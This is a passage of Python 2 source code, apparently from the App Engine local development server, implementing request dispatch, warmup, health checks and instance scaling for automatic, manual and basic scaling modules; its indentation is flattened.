# This is used to track the maximum number of outstanding requests in a time
# period. Protected by self._condition.
self._outstanding_request_history = collections.deque()
self._num_outstanding_instance_requests = 0 # Protected by self._condition.
# The time when the last instance was quit in seconds since the epoch.
self._last_instance_quit_time = 0 # Protected by self._condition.
self._condition = threading.Condition() # Protects instance state.
self._instance_adjustment_thread = threading.Thread(
target=self._loop_adjusting_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._instance_adjustment_thread.start()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._instance_adjustment_thread.join()
# The instance adjustment thread depends on the balanced module and the
    # watcher, so wait for it to exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
with self._condition:
instances = self._instances
self._instances = set()
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
@property
def num_outstanding_instance_requests(self):
"""The number of requests that instances are currently handling."""
with self._condition:
return self._num_outstanding_instance_requests
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if request_type != instance.READY_REQUEST:
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
logging.debug('Dispatching request to %s', inst)
return inst.handle(environ, start_response, url_map, match, request_id,
request_type)
finally:
with self._condition:
if request_type != instance.READY_REQUEST:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
start_time = time.time()
timeout_time = start_time + self._min_pending_latency
# Loop until an instance is available to handle the request.
while True:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if not inst:
inst = self._add_instance(permit_warmup=False)
if not inst:
# No instance is available nor can a new one be created, so loop
# waiting for one to be free.
timeout_time = time.time() + 0.2
continue
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ,
start_response,
url_map,
match,
request_id,
request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _add_instance(self, permit_warmup):
"""Creates and adds a new instance.Instance to the Module.
Args:
permit_warmup: If True then the new instance.Instance will be sent a new
warmup request if it is configured to receive them.
Returns:
The newly created instance.Instance. Returns None if no new instance
could be created because the maximum number of instances have already
been created.
"""
if self._max_instances is not None:
with self._condition:
if len(self._instances) >= self._max_instances:
return None
perform_warmup = permit_warmup and (
'warmup' in (self._module_configuration.inbound_services or []))
inst = self._instance_factory.new_instance(
self.generate_instance_id(),
expect_ready_request=perform_warmup)
with self._condition:
if self._quit_event.is_set():
return None
self._instances.add(inst)
if not inst.start():
return None
if perform_warmup:
self._async_warmup(inst)
else:
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
logging.debug('Created instance: %s', inst)
return inst
@staticmethod
def generate_instance_id():
return ''.join(random.choice(_LOWER_HEX_DIGITS) for _ in range(36))
def _warmup(self, inst):
"""Send a warmup request to the given instance."""
try:
environ = self.build_request_environ(
'GET', '/_ah/warmup', [], '', '0.1.0.3', self.balanced_port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling warmup request.')
def _async_warmup(self, inst):
"""Asynchronously send a markup request to the given Instance."""
return _THREAD_POOL.submit(self._warmup, inst)
def _trim_outstanding_request_history(self):
"""Removes obsolete entries from _outstanding_request_history."""
window_start = time.time() - self._REQUIRED_INSTANCE_WINDOW_SECONDS
with self._condition:
while self._outstanding_request_history:
t, _ = self._outstanding_request_history[0]
if t < window_start:
self._outstanding_request_history.popleft()
else:
break
def _get_num_required_instances(self):
"""Returns the number of Instances required to handle the request load."""
with self._condition:
self._trim_outstanding_request_history()
if not self._outstanding_request_history:
return 0
else:
peak_concurrent_requests = max(
current_requests
for (t, current_requests)
in self._outstanding_request_history)
return int(math.ceil(peak_concurrent_requests /
self.max_instance_concurrent_requests))
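  # Worked example (descriptive comment, not in the upstream source): if the
  # busiest moment inside the last _REQUIRED_INSTANCE_WINDOW_SECONDS saw 30
  # outstanding requests and each instance can handle 10 concurrent requests,
  # 30 / 10 = 3 instances are considered required.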
def _split_instances(self):
"""Returns a 2-tuple representing the required and extra Instances.
Returns:
A 2-tuple of (required_instances, not_required_instances):
required_instances: The set of the instance.Instances, in a state that
can handle requests, required to handle the current
request load.
not_required_instances: The set of the Instances contained in this
            Module that are not required.
"""
with self._condition:
num_required_instances = self._get_num_required_instances()
available = [inst for inst in self._instances
if inst.can_accept_requests]
available.sort(key=lambda inst: -inst.num_outstanding_requests)
required = set(available[:num_required_instances])
return required, self._instances - required
def _choose_instance(self, timeout_time):
"""Returns the best Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
required_instances, not_required_instances = self._split_instances()
if required_instances:
# Pick the instance with the most remaining capacity to handle
# requests.
required_instances = sorted(
required_instances,
key=lambda inst: inst.remaining_request_capacity)
if required_instances[-1].remaining_request_capacity:
return required_instances[-1]
available_instances = [inst for inst in not_required_instances
if inst.remaining_request_capacity > 0 and
inst.can_accept_requests]
if available_instances:
# Pick the instance with the *least* capacity to handle requests
# to avoid using unnecessary idle instances.
available_instances.sort(
key=lambda instance: instance.num_outstanding_requests)
return available_instances[-1]
else:
self._condition.wait(timeout_time - time.time())
return None
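  # Selection summary (descriptive comment, not in the upstream source):
  # "required" instances are preferred and the one with the most spare
  # capacity wins; otherwise the busiest not-required instance that still has
  # capacity is used, keeping truly idle instances idle so that
  # _adjust_instances() can quit them later.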
def _adjust_instances(self):
"""Creates new Instances or deletes idle Instances based on current load."""
now = time.time()
with self._condition:
_, not_required_instances = self._split_instances()
if len(not_required_instances) < self._min_idle_instances:
self._add_instance(permit_warmup=True)
elif (len(not_required_instances) > self._max_idle_instances and
now >
(self._last_instance_quit_time + self._MIN_SECONDS_BETWEEN_QUITS)):
for inst in not_required_instances:
if not inst.num_outstanding_requests:
try:
inst.quit()
except instance.CannotQuitServingInstance:
pass
else:
self._last_instance_quit_time = now
logging.debug('Quit instance: %s', inst)
with self._condition:
self._instances.discard(inst)
break
def _loop_adjusting_instances(self):
"""Loops until the Module exits, reloading, adding or removing Instances."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._adjust_instances()
self._quit_event.wait(timeout=1)
def __call__(self, environ, start_response):
return self._handle_request(environ, start_response)
class ManualScalingModule(Module):
"""A pool of instances that is manually-scaled."""
_DEFAULT_MANUAL_SCALING = appinfo.ManualScaling(instances='1')
@classmethod
def _populate_default_manual_scaling(cls, manual_scaling):
for attribute in manual_scaling.ATTRIBUTES:
if getattr(manual_scaling, attribute) in ('manual', None):
setattr(manual_scaling, attribute,
getattr(cls._DEFAULT_MANUAL_SCALING, attribute))
def _process_manual_scaling(self, manual_scaling):
if manual_scaling:
self._populate_default_manual_scaling(manual_scaling)
else:
manual_scaling = self._DEFAULT_MANUAL_SCALING
self._initial_num_instances = int(manual_scaling.instances)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for ManualScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
      runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
      php_config: A runtime_config_pb2.PhpConfig instance containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are used.
java_config: A runtime_config_pb2.JavaConfig instance containing
Java runtime-specific configuration. If None then defaults are used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
vm_config: A runtime_config_pb2.VMConfig instance containing
VM runtime-specific configuration. If None all docker-related stuff
is disabled.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
          file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(ManualScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_manual_scaling(module_configuration.manual_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# Whether the module has been stopped. Protected by self._condition.
self._suspended = False
self._condition = threading.Condition() # Protects instance state.
# Serializes operations that modify the serving state of or number of
# instances.
self._instances_change_lock = threading.RLock()
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
with self._instances_change_lock:
if self._max_instances is not None:
initial_num_instances = min(self._max_instances,
self._initial_num_instances)
else:
initial_num_instances = self._initial_num_instances
for _ in xrange(initial_num_instances):
self._add_instance()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
    # The change watcher thread depends on the balanced module and the
    # watcher, so wait for it to exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
start_time = time.time()
timeout_time = start_time + self._get_wait_time()
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
inst.wait(timeout_time)
if inst.has_quit:
return self._error_response(environ, start_response, 503)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = (
self._module_configuration.version_id.split('.', 1)[0])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._get_wait_time()
while time.time() < timeout_time:
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503, _TIMEOUT_HTML)
def _add_instance(self):
"""Creates and adds a new instance.Instance to the Module.
This must be called with _instances_change_lock held.
"""
instance_id = self.get_num_instances()
assert self._max_instances is None or instance_id < self._max_instances
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr = wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst))
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
health_check_config = self.module_configuration.vm_health_check
if (self.module_configuration.runtime == 'vm' and
health_check_config.enable_health_check):
self._add_health_checks(inst, wsgi_servr, health_check_config)
with self._condition:
if self._quit_event.is_set():
return
self._wsgi_servers.append(wsgi_servr)
self._instances.append(inst)
suspended = self._suspended
if not suspended:
self._async_start_instance(wsgi_servr, inst)
def _add_health_checks(self, inst, wsgi_servr, config):
do_health_check = functools.partial(
self._do_health_check, wsgi_servr, inst)
restart_instance = functools.partial(
self._restart_instance, inst)
health_checker = health_check_service.HealthChecker(
inst, config, do_health_check, restart_instance)
health_checker.start()
def _async_start_instance(self, wsgi_servr, inst):
return _THREAD_POOL.submit(self._start_instance, wsgi_servr, inst)
def _start_instance(self, wsgi_servr, inst):
try:
if not inst.start():
return
except:
logging.exception('Internal error while starting instance.')
raise
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except Exception, e: # pylint: disable=broad-except
logging.exception('Internal error while handling start request: %s', e)
def _do_health_check(self, wsgi_servr, inst, start_response,
is_last_successful):
is_last_successful = 'yes' if is_last_successful else 'no'
url = '/_ah/health?%s' % urllib.urlencode(
[('IsLastSuccessful', is_last_successful)])
environ = self.build_request_environ(
'GET', url, [], '', '', wsgi_servr.port,
fake_login=True)
return self._handle_request(
environ,
start_response,
inst=inst,
request_type=instance.NORMAL_REQUEST)
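# Note: with the urlencode call above, the health-check path sent to the instance looks like
# /_ah/health?IsLastSuccessful=yes (or IsLastSuccessful=no).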
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
for inst in self._instances:
if inst.can_accept_requests:
return inst
self._condition.wait(timeout_time - time.time())
return None
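# Note: the loop above blocks on self._condition for at most the remaining deadline, so it
# wakes up either when an instance becomes available (a notify elsewhere in this module) or
# when the overall wait budget is exhausted, in which case None is returned.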
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
file_changes = self._watcher.changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if file_changes:
logging.info(
'Detected file changes:\n %s', '\n '.join(sorted(file_changes)))
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or file_changes:
with self._instances_change_lock:
if not self._suspended:
self.restart()
def _loop_watching_for_changes(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def get_num_instances(self):
with self._instances_change_lock:
with self._condition:
return len(self._instances)
def set_num_instances(self, instances):
if self._max_instances is not None:
instances = min(instances, self._max_instances)
with self._instances_change_lock:
with self._condition:
running_instances = self.get_num_instances()
if running_instances > instances:
wsgi_servers_to_quit = self._wsgi_servers[instances:]
del self._wsgi_servers[instances:]
instances_to_quit = self._instances[instances:]
del self._instances[instances:]
if running_instances < instances:
for _ in xrange(instances - running_instances):
self._add_instance()
if running_instances > instances:
for inst, wsgi_servr in zip(instances_to_quit, wsgi_servers_to_quit):
self._async_quit_instance(inst, wsgi_servr)
def _async_quit_instance(self, inst, wsgi_servr):
return _THREAD_POOL.submit(self._quit_instance, inst, wsgi_servr)
def _quit_instance(self, inst, wsgi_servr):
port = wsgi_servr.port
wsgi_servr.quit()
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def suspend(self):
"""Suspends serving for this module, quitting all running instances."""
with self._instances_change_lock:
if self._suspended:
raise request_info.VersionAlreadyStoppedError()
self._suspended = True
with self._condition:
instances_to_stop = zip(self._instances, self._wsgi_servers)
for wsgi_servr in self._wsgi_servers:
wsgi_servr.set_error(404)
for inst, wsgi_servr in instances_to_stop:
self._async_suspend_instance(inst, wsgi_servr.port)
def _async_suspend_instance(self, inst, port):
return _THREAD_POOL.submit(self._suspend_instance, inst, port)
def _suspend_instance(self, inst, port):
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def resume(self):
"""Resumes serving for this module."""
with self._instances_change_lock:
if not self._suspended:
raise request_info.VersionAlreadyStartedError()
self._suspended = False
with self._condition:
if self._quit_event.is_set():
return
wsgi_servers = self._wsgi_servers
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[instance_id] = inst
instances_to_start.append((wsgi_servr, inst))
for wsgi_servr, inst in instances_to_start:
self._async_start_instance(wsgi_servr, inst)
def restart(self):
"""Restarts the module, replacing all running instances."""
with self._instances_change_lock:
with self._condition:
if self._quit_event.is_set():
return
instances_to_stop = self._instances[:]
wsgi_servers = self._wsgi_servers[:]
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
instances_to_start.append(inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[:] = instances_to_start
# Just force instances to stop for a faster restart.
for inst in instances_to_stop:
inst.quit(force=True)
start_futures = [
self._async_start_instance(wsgi_servr, inst)
for wsgi_servr, inst in zip(wsgi_servers, instances_to_start)]
logging.info('Waiting for instances to restart')
health_check_config = self.module_configuration.vm_health_check
for (inst, wsgi_servr) in zip(instances_to_start, wsgi_servers):
if (self.module_configuration.runtime == 'vm'
and health_check_config.enable_health_check):
self._add_health_checks(inst, wsgi_servr, health_check_config)
_, not_done = futures.wait(start_futures, timeout=_SHUTDOWN_TIMEOUT)
if not_done:
logging.warning('Some instances may not have restarted')
else:
logging.info('Instances restarted')
def _restart_instance(self, inst):
"""Restarts the specified instance."""
with self._instances_change_lock:
# Quit the old instance.
inst.quit(force=True)
# Create the new instance.
new_instance = self._instance_factory.new_instance(inst.instance_id)
wsgi_servr = self._wsgi_servers[inst.instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
# Start the new instance.
self._start_instance(wsgi_servr, new_instance)
health_check_config = self.module_configuration.vm_health_check
if (self.module_configuration.runtime == 'vm'
and health_check_config.enable_health_check):
self._add_health_checks(new_instance, wsgi_servr, health_check_config)
# Replace it in the module registry.
with self._instances_change_lock:
with self._condition:
self._instances[new_instance.instance_id] = new_instance
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class BasicScalingModule(Module):
"""A pool of instances that is basic-scaled."""
_DEFAULT_BASIC_SCALING = appinfo.BasicScaling(max_instances='1',
idle_timeout='15m')
@staticmethod
def _parse_idle_timeout(timing):
"""Parse a idle timeout string into an int of the value in seconds.
Args:
timing: A str of the form 1m or 10s.
Returns:
An int representation of the value in seconds.
"""
if timing.endswith('m'):
return int(timing[:-1]) * 60
else:
return int(timing[:-1])
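# For example (illustrative values): _parse_idle_timeout('15m') returns 900, since minutes are
# multiplied by 60, while _parse_idle_timeout('10s') simply strips the suffix and returns 10.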
@classmethod
def _populate_default_basic_scaling(cls, basic_scaling):
for attribute in basic_scaling.ATTRIBUTES:
if getattr(basic_scaling, attribute) in ('basic', None):
setattr(basic_scaling, attribute,
getattr(cls._DEFAULT_BASIC_SCALING, attribute))
def _process_basic_scaling(self, basic_scaling):
if basic_scaling:
self._populate_default_basic_scaling(basic_scaling)
else:
basic_scaling = self._DEFAULT_BASIC_SCALING
if self._max_instances is not None:
self._max_instances = min(self._max_instances,
int(basic_scaling.max_instances))
else:
self._max_instances = int(basic_scaling.max_instances)
self._instance_idle_timeout = self._parse_idle_timeout(
basic_scaling.idle_timeout)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for BasicScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instance containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are used.
java_config: A runtime_config_pb2.JavaConfig instance containing
Java runtime-specific configuration. If None then defaults are used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
vm_config: A runtime_config_pb2.VMConfig instance containing
VM runtime-specific configuration. If None all docker-related stuff
is disabled.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(BasicScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_basic_scaling(module_configuration.basic_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# A list of booleans signifying whether the corresponding instance in
# self._instances has been or is being started.
self._instance_running = [] # Protected by self._condition.
for instance_id in xrange(self._max_instances):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
self._instances.append(inst)
self._wsgi_servers.append(wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst)))
self._instance_running.append(False)
self._condition = threading.Condition() # Protects instance state.
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes_and_idle_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
for wsgi_servr, inst in zip(self._wsgi_servers, self._instances):
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher so wait for it to exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
instance_id = inst.instance_id
start_time = time.time()
timeout_time = start_time + self._get_wait_time()
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
if inst.has_quit:
return self._error_response(environ, start_response, 503)
with self._condition:
if self._instance_running[instance_id]:
should_start = False
else:
self._instance_running[instance_id] = True
should_start = True
if should_start:
self._start_instance(instance_id)
else:
inst.wait(timeout_time)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = (
self._module_configuration.version_id.split('.', 1)[0])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
